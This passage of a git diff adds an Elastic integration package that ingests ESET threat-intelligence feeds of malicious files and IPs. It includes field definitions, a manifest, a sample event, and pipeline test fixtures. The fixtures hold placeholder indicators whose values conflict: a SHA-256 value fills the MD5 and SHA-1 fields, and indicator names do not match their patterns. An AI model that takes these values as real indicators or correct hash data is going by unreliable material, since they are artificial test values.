type: keyword + ignore_above: 1024 + description: OS family (such as redhat, debian, freebsd, windows). + example: debian + - name: os.kernel + level: extended + type: keyword + ignore_above: 1024 + description: Operating system kernel version as a raw string. + example: 4.4.0-112-generic + - name: os.name + level: extended + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + default_field: false + description: Operating system name, without the version. + example: Mac OS X + - name: os.platform + level: extended + type: keyword + ignore_above: 1024 + description: Operating system platform (such centos, ubuntu, windows). + example: darwin + - name: os.version + level: extended + type: keyword + ignore_above: 1024 + description: Operating system version as a raw string. + example: 10.14.1 + - name: type + level: core + type: keyword + ignore_above: 1024 + description: 'Type of host. + + For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment.' + - name: containerized + type: boolean + description: > + If the host is a container. + + - name: os.build + type: keyword + example: "18D109" + description: > + OS build information. + + - name: os.codename + type: keyword + example: "stretch" + description: > + OS codename, if any. + +- name: input.type + type: keyword + description: Input type. diff --git a/packages/ti_eset/data_stream/files/fields/base-fields.yml b/packages/ti_eset/data_stream/files/fields/base-fields.yml new file mode 100644 index 00000000000..7c798f4534c --- /dev/null +++ b/packages/ti_eset/data_stream/files/fields/base-fields.yml @@ -0,0 +1,12 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: '@timestamp' + type: date + description: Event timestamp. diff --git a/packages/ti_eset/data_stream/files/fields/ecs.yml b/packages/ti_eset/data_stream/files/fields/ecs.yml new file mode 100644 index 00000000000..43534883f1c --- /dev/null +++ b/packages/ti_eset/data_stream/files/fields/ecs.yml @@ -0,0 +1,42 @@ +- external: ecs + name: ecs.version +- external: ecs + name: message +- external: ecs + name: error.message +- external: ecs + name: event.category +- external: ecs + name: event.ingested +- external: ecs + name: event.kind +- external: ecs + name: event.original +- external: ecs + name: event.created +- external: ecs + name: tags +- external: ecs + name: threat.indicator.name +- external: ecs + name: threat.indicator.confidence +- external: ecs + name: threat.indicator.provider +- external: ecs + name: threat.indicator.url.original +- external: ecs + name: threat.indicator.file.hash.md5 +- external: ecs + name: threat.indicator.file.hash.sha1 +- external: ecs + name: threat.indicator.file.hash.sha256 +- external: ecs + name: threat.indicator.type +- external: ecs + name: threat.indicator.description +- external: ecs + name: threat.indicator.modified_at +- external: ecs + name: threat.indicator.last_seen +- external: ecs + name: threat.feed.name diff --git a/packages/ti_eset/data_stream/files/fields/fields.yml b/packages/ti_eset/data_stream/files/fields/fields.yml new file mode 100644 index 00000000000..bf7e7383df2 --- /dev/null +++ b/packages/ti_eset/data_stream/files/fields/fields.yml @@ -0,0 +1,21 @@ +- name: eset + type: group + description: > + Fields for ESET Threat Intelligence + + fields: + - name: id + type: keyword + description: The UID of the event object. + - name: valid_until + type: date + description: >- + Event expiration date. + - name: labels + type: keyword + description: >- + Threat labels. +- name: labels.is_ioc_transform_source + type: constant_keyword + value: 'true' + description: Field indicating if its the transform source for supporting IOC expiration. This field is dropped from destination indices to facilitate easier filtering of indicators. diff --git a/packages/ti_eset/data_stream/files/lifecycle.yml b/packages/ti_eset/data_stream/files/lifecycle.yml new file mode 100644 index 00000000000..326b14e00f6 --- /dev/null +++ b/packages/ti_eset/data_stream/files/lifecycle.yml @@ -0,0 +1 @@ +data_retention: 7d diff --git a/packages/ti_eset/data_stream/files/manifest.yml b/packages/ti_eset/data_stream/files/manifest.yml new file mode 100644 index 00000000000..3f76d82a9ea --- /dev/null +++ b/packages/ti_eset/data_stream/files/manifest.yml @@ -0,0 +1,95 @@ +title: "Malicious files" +type: logs +ilm_policy: logs-ti_eset.files-default_policy +streams: + - input: httpjson + title: Malicious files + description: Collect data from ETI Malicious file feed + template_path: httpjson.yml.hbs + vars: + - name: url + description: URL with API root and identifier of Malicious files collection as described by [TAXII v2.1 standard](https://docs.oasis-open.org/cti/taxii/v2.1/os/taxii-v2.1-os.html#_Toc31107514) + type: text + title: Collection URL + multi: false + required: true + show_user: true + default: https://taxii.eset.com/taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/ee6a153ed77e4ec3ab21e76cc2074b9f/objects/ + - name: enable_request_tracer + type: bool + title: Enable request tracing + multi: false + required: false + show_user: false + description: The request tracer logs requests and responses to the agent's local file-system for debugging configurations. Enabling this request tracing compromises security and should only be used for debugging. See [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-httpjson.html#_request_tracer_filename) for details. + - name: http_client_timeout + type: text + title: HTTP Client Timeout + description: Duration before declaring that the HTTP client connection has timed out. Valid time units are ns, us, ms, s, m, h. + multi: false + required: false + show_user: false + default: 1m + - name: proxy_url + type: text + title: Proxy URL + multi: false + required: false + show_user: false + description: URL to proxy connections in the form of http\[s\]://:@: + - name: interval + type: text + title: Interval + description: Interval at which the logs will be pulled. Supported units for this parameter are h/m/s. + multi: false + required: true + show_user: true + default: 1h + - name: initial_interval + type: text + title: Initial Interval + multi: false + required: true + show_user: false + default: 48h + description: How far back to look for indicators the first time the agent is started. Supported units for this parameter are h/m/s. + - name: page_size + type: integer + multi: false + required: false + default: "1000" + show_user: false + title: Page size + description: Maximum number of records to pull in one request. + - name: ssl + type: yaml + title: SSL + multi: false + required: false + show_user: false + - name: tags + type: text + title: Tags + multi: true + required: true + show_user: false + default: + - forwarded + - eset-files + - name: preserve_original_event + required: true + show_user: true + title: Preserve original event + description: Preserves a raw copy of the original event, added to the field `event.original` + type: bool + multi: false + default: false + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: > + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + diff --git a/packages/ti_eset/data_stream/files/sample_event.json b/packages/ti_eset/data_stream/files/sample_event.json new file mode 100644 index 00000000000..9881c7e92bc --- /dev/null +++ b/packages/ti_eset/data_stream/files/sample_event.json @@ -0,0 +1,73 @@ +{ + "@timestamp": "2023-10-19T02:00:38.000Z", + "agent": { + "ephemeral_id": "205a7540-b015-4c5a-9534-191e2f7c11f1", + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.1" + }, + "data_stream": { + "dataset": "ti_eset.files", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "snapshot": false, + "version": "8.12.1" + }, + "eset": { + "id": "indicator--5d7e9ad6-7b48-42fa-8598-d474e8da1b0f", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-21T02:00:38.000Z" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "threat" + ], + "created": "2024-03-27T14:21:17.805Z", + "dataset": "ti_eset.files", + "ingested": "2024-03-27T14:21:29Z", + "kind": "enrichment", + "original": "{\"created\":\"2023-10-19T02:00:38.000Z\",\"description\":\"Each of these file hashes indicates that a variant of HTML/Phishing.Agent.EVU trojan is present.\",\"id\":\"indicator--5d7e9ad6-7b48-42fa-8598-d474e8da1b0f\",\"labels\":[\"malicious-activity\"],\"modified\":\"2023-10-19T02:00:38.000Z\",\"name\":\"b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7\",\"pattern\":\"[file:hashes.'SHA-256'='b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7'] OR [file:hashes.'SHA-1'='b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7'] OR [file:hashes.'MD5'='b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7']\",\"pattern_type\":\"stix\",\"pattern_version\":\"2.1\",\"spec_version\":\"indicator\",\"type\":\"indicator\",\"valid_from\":\"2023-10-19T02:00:38Z\",\"valid_until\":\"2023-10-21T02:00:38Z\"}", + "type": [ + "indicator" + ] + }, + "input": { + "type": "httpjson" + }, + "tags": [ + "preserve_original_event", + "forwarded", + "eset-files" + ], + "threat": { + "feed": { + "name": "ESET Malicious Files stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Each of these file hashes indicates that a variant of HTML/Phishing.Agent.EVU trojan is present.", + "file": { + "hash": { + "md5": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", + "sha1": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", + "sha256": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7" + } + }, + "last_seen": "2023-10-19T02:00:38.000Z", + "modified_at": "2023-10-19T02:00:38.000Z", + "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", + "provider": "eset", + "type": "file" + } + } +} \ No newline at end of file diff --git a/packages/ti_eset/data_stream/ip/_dev/test/pipeline/test-common-config.yml b/packages/ti_eset/data_stream/ip/_dev/test/pipeline/test-common-config.yml new file mode 100644 index 00000000000..4da22641654 --- /dev/null +++ b/packages/ti_eset/data_stream/ip/_dev/test/pipeline/test-common-config.yml @@ -0,0 +1,3 @@ +fields: + tags: + - preserve_original_event diff --git a/packages/ti_eset/data_stream/ip/_dev/test/pipeline/test-eset-ndjson.log b/packages/ti_eset/data_stream/ip/_dev/test/pipeline/test-eset-ndjson.log new file mode 100644 index 00000000000..7f0124a3504 --- /dev/null +++ b/packages/ti_eset/data_stream/ip/_dev/test/pipeline/test-eset-ndjson.log @@ -0,0 +1,10 @@ +{"id": "indicator--38cddce7-f1e3-49d0-91f6-1423f0e157ca", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:20:04.000Z", "modified": "2023-10-15T02:20:04.000Z", "name": "5.2.75.227", "description": "FTP bruteforce IP", "pattern": "[ipv4-addr:value='1.128.0.0:8080']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:20:04Z", "valid_until": "2023-10-17T02:20:04Z", "labels": ["malicious-activity"]} +{"id": "indicator--dc5b08dd-0c5e-4b7b-902e-cc212be7ee80", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:20:04.000Z", "modified": "2023-10-15T02:20:04.000Z", "name": "5.2.75.227", "description": "MySQL bruteforce IP", "pattern": "[ipv4-addr:value='1.128.0.0']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:20:04Z", "valid_until": "2023-10-17T02:20:04Z", "labels": ["malicious-activity"]} +{"id": "indicator--76c98e1d-aad2-4d3c-9618-95327aa8fb16", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:20:04.000Z", "modified": "2023-10-15T02:20:04.000Z", "name": "5.2.75.227", "description": "Web services scanning and attacks", "pattern": "[ipv4-addr:value='1.128.0.0/11']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:20:04Z", "valid_until": "2023-10-17T02:20:04Z", "labels": ["malicious-activity"]} +{"id": "indicator--e04adbf1-6fd4-4b80-b780-35c9550a36ef", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:20:04.000Z", "modified": "2023-10-15T02:20:04.000Z", "name": "5.2.75.227", "description": "Web services scanning and attacks", "pattern": "[ipv4-addr:value='1.128.0.0/11']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:20:04Z", "valid_until": "2023-10-17T02:20:04Z", "labels": ["malicious-activity"]} +{"id": "indicator--ec0c8daf-33f2-48cc-a377-86e60a30516b", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:20:04.000Z", "modified": "2023-10-15T02:20:04.000Z", "name": "5.2.75.227", "description": "Web services scanning and attacks", "pattern": "[ipv4-addr:value='1.128.0.0/11']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:20:04Z", "valid_until": "2023-10-17T02:20:04Z", "labels": ["malicious-activity"]} +{"id": "indicator--341fa6d7-b866-449b-bd41-7cd5410f634c", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:20:04.000Z", "modified": "2023-10-15T02:20:04.000Z", "name": "5.2.75.227", "description": "Web services scanning and attacks", "pattern": "[ipv4-addr:value='1.128.0.0/11']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:20:04Z", "valid_until": "2023-10-17T02:20:04Z", "labels": ["malicious-activity"]} +{"id": "indicator--53798940-e5aa-42b7-a2cb-44d1f3b61640", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:20:04.000Z", "modified": "2023-10-15T02:20:04.000Z", "name": "5.2.75.227", "description": "Web services scanning and attacks", "pattern": "[ipv4-addr:value='1.128.0.0/11']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:20:04Z", "valid_until": "2023-10-17T02:20:04Z", "labels": ["malicious-activity"]} +{"id": "indicator--aac59262-2567-45aa-9358-e7850c5ea301", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T03:00:05.000Z", "modified": "2023-10-15T03:00:05.000Z", "name": "5.2.75.227", "description": "Host is known to be actively distributing threats or is of uncertain reputation.", "pattern": "[ipv4-addr:value='1.128.0.0/11:80']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T03:00:05Z", "valid_until": "2023-10-17T03:00:05Z", "labels": ["benign"]} +{"id": "indicator--79211a5b-f76b-4025-a640-0a3a0440b5b3", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T03:00:05.000Z", "modified": "2023-10-15T03:00:05.000Z", "name": "5.2.75.227", "description": "Host actively distributes high-severity threat in the form of executable code.", "pattern": "[ipv4-addr:value='1.128.0.0/11:8081']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T03:00:05Z", "valid_until": "2023-10-17T03:00:05Z", "labels": ["benign"]} +{"id": "indicator--60b61a83-36d0-4c29-bd92-b0bde20815a4", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T03:00:05.000Z", "modified": "2023-10-15T03:00:05.000Z", "name": "5.2.75.227", "description": "Host actively distributes high-severity threat in the form of executable code.", "pattern": "[ipv4-addr:value='1.128.0.0/11:80']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T03:00:05Z", "valid_until": "2023-10-17T03:00:05Z", "labels": ["benign"]} \ No newline at end of file diff --git a/packages/ti_eset/data_stream/ip/_dev/test/pipeline/test-eset-ndjson.log-expected.json b/packages/ti_eset/data_stream/ip/_dev/test/pipeline/test-eset-ndjson.log-expected.json new file mode 100644 index 00000000000..8e3c918349f --- /dev/null +++ b/packages/ti_eset/data_stream/ip/_dev/test/pipeline/test-eset-ndjson.log-expected.json @@ -0,0 +1,412 @@ +{ + "expected": [ + { + "@timestamp": "2023-10-15T02:20:04.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--38cddce7-f1e3-49d0-91f6-1423f0e157ca", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:20:04.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--38cddce7-f1e3-49d0-91f6-1423f0e157ca\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:20:04.000Z\", \"modified\": \"2023-10-15T02:20:04.000Z\", \"name\": \"5.2.75.227\", \"description\": \"FTP bruteforce IP\", \"pattern\": \"[ipv4-addr:value='1.128.0.0:8080']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:20:04Z\", \"valid_until\": \"2023-10-17T02:20:04Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET IP stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "FTP bruteforce IP", + "ip": "1.128.0.0", + "last_seen": "2023-10-15T02:20:04.000Z", + "modified_at": "2023-10-15T02:20:04.000Z", + "name": "5.2.75.227", + "port": 8080, + "provider": "eset", + "type": "ipv4-addr" + } + } + }, + { + "@timestamp": "2023-10-15T02:20:04.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--dc5b08dd-0c5e-4b7b-902e-cc212be7ee80", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:20:04.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--dc5b08dd-0c5e-4b7b-902e-cc212be7ee80\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:20:04.000Z\", \"modified\": \"2023-10-15T02:20:04.000Z\", \"name\": \"5.2.75.227\", \"description\": \"MySQL bruteforce IP\", \"pattern\": \"[ipv4-addr:value='1.128.0.0']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:20:04Z\", \"valid_until\": \"2023-10-17T02:20:04Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET IP stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "MySQL bruteforce IP", + "ip": "1.128.0.0", + "last_seen": "2023-10-15T02:20:04.000Z", + "modified_at": "2023-10-15T02:20:04.000Z", + "name": "5.2.75.227", + "provider": "eset", + "type": "ipv4-addr" + } + } + }, + { + "@timestamp": "2023-10-15T02:20:04.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--76c98e1d-aad2-4d3c-9618-95327aa8fb16", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:20:04.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--76c98e1d-aad2-4d3c-9618-95327aa8fb16\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:20:04.000Z\", \"modified\": \"2023-10-15T02:20:04.000Z\", \"name\": \"5.2.75.227\", \"description\": \"Web services scanning and attacks\", \"pattern\": \"[ipv4-addr:value='1.128.0.0/11']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:20:04Z\", \"valid_until\": \"2023-10-17T02:20:04Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET IP stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Web services scanning and attacks", + "ip": "1.128.0.0", + "last_seen": "2023-10-15T02:20:04.000Z", + "modified_at": "2023-10-15T02:20:04.000Z", + "name": "5.2.75.227", + "provider": "eset", + "type": "ipv4-addr" + } + } + }, + { + "@timestamp": "2023-10-15T02:20:04.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--e04adbf1-6fd4-4b80-b780-35c9550a36ef", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:20:04.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--e04adbf1-6fd4-4b80-b780-35c9550a36ef\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:20:04.000Z\", \"modified\": \"2023-10-15T02:20:04.000Z\", \"name\": \"5.2.75.227\", \"description\": \"Web services scanning and attacks\", \"pattern\": \"[ipv4-addr:value='1.128.0.0/11']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:20:04Z\", \"valid_until\": \"2023-10-17T02:20:04Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET IP stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Web services scanning and attacks", + "ip": "1.128.0.0", + "last_seen": "2023-10-15T02:20:04.000Z", + "modified_at": "2023-10-15T02:20:04.000Z", + "name": "5.2.75.227", + "provider": "eset", + "type": "ipv4-addr" + } + } + }, + { + "@timestamp": "2023-10-15T02:20:04.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--ec0c8daf-33f2-48cc-a377-86e60a30516b", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:20:04.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--ec0c8daf-33f2-48cc-a377-86e60a30516b\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:20:04.000Z\", \"modified\": \"2023-10-15T02:20:04.000Z\", \"name\": \"5.2.75.227\", \"description\": \"Web services scanning and attacks\", \"pattern\": \"[ipv4-addr:value='1.128.0.0/11']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:20:04Z\", \"valid_until\": \"2023-10-17T02:20:04Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET IP stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Web services scanning and attacks", + "ip": "1.128.0.0", + "last_seen": "2023-10-15T02:20:04.000Z", + "modified_at": "2023-10-15T02:20:04.000Z", + "name": "5.2.75.227", + "provider": "eset", + "type": "ipv4-addr" + } + } + }, + { + "@timestamp": "2023-10-15T02:20:04.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--341fa6d7-b866-449b-bd41-7cd5410f634c", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:20:04.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--341fa6d7-b866-449b-bd41-7cd5410f634c\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:20:04.000Z\", \"modified\": \"2023-10-15T02:20:04.000Z\", \"name\": \"5.2.75.227\", \"description\": \"Web services scanning and attacks\", \"pattern\": \"[ipv4-addr:value='1.128.0.0/11']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:20:04Z\", \"valid_until\": \"2023-10-17T02:20:04Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET IP stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Web services scanning and attacks", + "ip": "1.128.0.0", + "last_seen": "2023-10-15T02:20:04.000Z", + "modified_at": "2023-10-15T02:20:04.000Z", + "name": "5.2.75.227", + "provider": "eset", + "type": "ipv4-addr" + } + } + }, + { + "@timestamp": "2023-10-15T02:20:04.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--53798940-e5aa-42b7-a2cb-44d1f3b61640", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:20:04.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--53798940-e5aa-42b7-a2cb-44d1f3b61640\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:20:04.000Z\", \"modified\": \"2023-10-15T02:20:04.000Z\", \"name\": \"5.2.75.227\", \"description\": \"Web services scanning and attacks\", \"pattern\": \"[ipv4-addr:value='1.128.0.0/11']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:20:04Z\", \"valid_until\": \"2023-10-17T02:20:04Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET IP stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Web services scanning and attacks", + "ip": "1.128.0.0", + "last_seen": "2023-10-15T02:20:04.000Z", + "modified_at": "2023-10-15T02:20:04.000Z", + "name": "5.2.75.227", + "provider": "eset", + "type": "ipv4-addr" + } + } + }, + { + "@timestamp": "2023-10-15T03:00:05.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--aac59262-2567-45aa-9358-e7850c5ea301", + "labels": [ + "benign" + ], + "valid_until": "2023-10-17T03:00:05.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--aac59262-2567-45aa-9358-e7850c5ea301\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T03:00:05.000Z\", \"modified\": \"2023-10-15T03:00:05.000Z\", \"name\": \"5.2.75.227\", \"description\": \"Host is known to be actively distributing threats or is of uncertain reputation.\", \"pattern\": \"[ipv4-addr:value='1.128.0.0/11:80']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T03:00:05Z\", \"valid_until\": \"2023-10-17T03:00:05Z\", \"labels\": [\"benign\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET IP stix 2.1" + }, + "indicator": { + "confidence": "Low", + "description": "Host is known to be actively distributing threats or is of uncertain reputation.", + "last_seen": "2023-10-15T03:00:05.000Z", + "modified_at": "2023-10-15T03:00:05.000Z", + "name": "5.2.75.227", + "provider": "eset", + "type": "ipv4-addr" + } + } + }, + { + "@timestamp": "2023-10-15T03:00:05.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--79211a5b-f76b-4025-a640-0a3a0440b5b3", + "labels": [ + "benign" + ], + "valid_until": "2023-10-17T03:00:05.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--79211a5b-f76b-4025-a640-0a3a0440b5b3\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T03:00:05.000Z\", \"modified\": \"2023-10-15T03:00:05.000Z\", \"name\": \"5.2.75.227\", \"description\": \"Host actively distributes high-severity threat in the form of executable code.\", \"pattern\": \"[ipv4-addr:value='1.128.0.0/11:8081']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T03:00:05Z\", \"valid_until\": \"2023-10-17T03:00:05Z\", \"labels\": [\"benign\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET IP stix 2.1" + }, + "indicator": { + "confidence": "Low", + "description": "Host actively distributes high-severity threat in the form of executable code.", + "last_seen": "2023-10-15T03:00:05.000Z", + "modified_at": "2023-10-15T03:00:05.000Z", + "name": "5.2.75.227", + "provider": "eset", + "type": "ipv4-addr" + } + } + }, + { + "@timestamp": "2023-10-15T03:00:05.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--60b61a83-36d0-4c29-bd92-b0bde20815a4", + "labels": [ + "benign" + ], + "valid_until": "2023-10-17T03:00:05.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--60b61a83-36d0-4c29-bd92-b0bde20815a4\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T03:00:05.000Z\", \"modified\": \"2023-10-15T03:00:05.000Z\", \"name\": \"5.2.75.227\", \"description\": \"Host actively distributes high-severity threat in the form of executable code.\", \"pattern\": \"[ipv4-addr:value='1.128.0.0/11:80']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T03:00:05Z\", \"valid_until\": \"2023-10-17T03:00:05Z\", \"labels\": [\"benign\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET IP stix 2.1" + }, + "indicator": { + "confidence": "Low", + "description": "Host actively distributes high-severity threat in the form of executable code.", + "last_seen": "2023-10-15T03:00:05.000Z", + "modified_at": "2023-10-15T03:00:05.000Z", + "name": "5.2.75.227", + "provider": "eset", + "type": "ipv4-addr" + } + } + } + ] +} \ No newline at end of file diff --git a/packages/ti_eset/data_stream/ip/_dev/test/system/test-httpjson-config.yml b/packages/ti_eset/data_stream/ip/_dev/test/system/test-httpjson-config.yml new file mode 100644 index 00000000000..c923ad19c20 --- /dev/null +++ b/packages/ti_eset/data_stream/ip/_dev/test/system/test-httpjson-config.yml @@ -0,0 +1,13 @@ +input: httpjson +service: eti +vars: + username: test + password: test +data_stream: + vars: + preserve_original_event: true + url: http://{{Hostname}}:{{Port}}/taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/baaed2a92335418aa753fe944e13c23a/objects/ + interval: 30s + enable_request_tracer: true +assert: + hit_count: 2 diff --git a/packages/ti_eset/data_stream/ip/agent/stream/httpjson.yml.hbs b/packages/ti_eset/data_stream/ip/agent/stream/httpjson.yml.hbs new file mode 100644 index 00000000000..41117cedade --- /dev/null +++ b/packages/ti_eset/data_stream/ip/agent/stream/httpjson.yml.hbs @@ -0,0 +1,72 @@ +config_version: "2" + +interval: {{interval}} +request.method: "GET" +{{#if enable_request_tracer}} +request.tracer.filename: "../../logs/httpjson/http-request-trace-*.ndjson" +{{/if}} + +auth.basic.user: {{username}} +auth.basic.password: {{password}} + +{{#if url}} +request.url: {{url}} +{{/if}} +{{#if ssl}} +request.ssl: {{ssl}} +{{/if}} +{{#if http_client_timeout}} +request.timeout: {{http_client_timeout}} +{{/if}} +{{#if proxy_url}} +request.proxy_url: {{proxy_url}} +{{/if}} + +request.transforms: + - set: + target: header.Content-Type + value: application/taxii+json;version=2.1 + - set: + target: header.Accept + value: 